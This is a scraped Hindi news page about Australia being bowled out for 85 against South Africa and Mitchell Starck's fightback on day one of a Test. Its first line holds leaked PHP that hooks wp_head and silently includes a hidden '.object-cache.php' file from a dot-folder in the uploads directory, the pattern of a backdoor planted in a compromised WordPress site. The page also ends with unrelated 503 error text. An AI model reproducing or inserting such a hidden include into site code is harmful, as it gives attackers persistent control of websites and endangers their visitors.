add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); AUSvsSA: 85 पर ढेर ऑस्ट्रेलिया को स्टार्क ने दिलाई वापसी – SOCH INDIA
Menu

खेल
AUSvsSA: 85 पर ढेर ऑस्ट्रेलिया को स्टार्क ने दिलाई वापसी

nobanner

ऑस्ट्रेलिया के दक्षिण अफ्रीका के खिलाफ घरेलू मैदान पर सबसे कम स्कोर पर आउट होने के बाद मिशेल स्टार्क ने अपनी शानदार गेंदबाजी से मेजबान टीम को दूसरे क्रिकेट टेस्ट के पहले दिन वापसी दिलाई.

ऑस्ट्रेलिया के 32.5 ओवर में 85 रन पर ढेर होने के बाद बायें हाथ के तेज गेंदबाज स्टार्क ने चाय के बाद 10 गेंद के अंदर तीन विकेट चटकाए जिससे दक्षिण अफ्रीका ने दिन का खेल खत्म होने तक पांच विकेट पर 171 रन बनाए.

दक्षिण अफ्रीका को 86 रन की बढ़त हासिल है जबकि उसके पांच विकेट शेष हैं. तेंबा बावुमा 38 जबकि क्विंटन डि काक 28 रन बनाकर खेल रहे हैं.

दिन के खेल के दौरान 15 विकेट गिरे जबकि 256 रन बने.

इससे पहले वर्नन फिलेंडर ने 21 रन देकर पांच विकेट चटकाकर दक्षिण अफ्रीका को शानदार शुरूआत दिलाई और ऑस्ट्रेलियाई टीम ने घरेलू मैदान पर इस टीम के खिलाफ अपना सबसे कम स्कोर बनाया.

ऑस्ट्रेलिया की ओर से कप्तान स्टीवन स्मिथ ही टिककर बल्लेबाजी कर पाए जिन्होंने नाबाद 48 रन की पारी खेली. उनके अलावा जो मैनी (10) ही दोहरे अंक में पहुंच पाए.

दक्षिण अफ्रीका ने इसके जवाब में बिना विकेट खोए 43 रन बनाकर अच्छी शुरूआत की जिसके बाद स्टार्क ने डीन एल्गर (17), स्टीफन कुक (23) और जेपी डुमिनी (01) को पवेलियन भेजकर उसका स्कोर तीन विकेट पर 46 रन किया. तेज गेंदबाज जोश हेजलवुड ने कप्तान फाफ डु प्लेसिस (07) को पगबाधा आउट किया. हाशिम अमला भी 67 गेंद में 47 रन की उम्दा पारी खेलने के बाद हेजलवुड की गेंद पर विकेटकीपर पीटर नेविल को कैच दे बैठे जिससे टीम का स्कोर पांच विकेट पर 132 रन हो गए.

बावुमा और डिकाक ने इसके बाद 39 रन की अटूट साझेदारी करके दक्षिण अफ्रीका को और झटके नहीं लगने दिए.

स्टार्क ने अब तक 49 रन देकर तीन जबकि हेजलवुड ने 36 रन देकर दो विकेट चटकाए हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.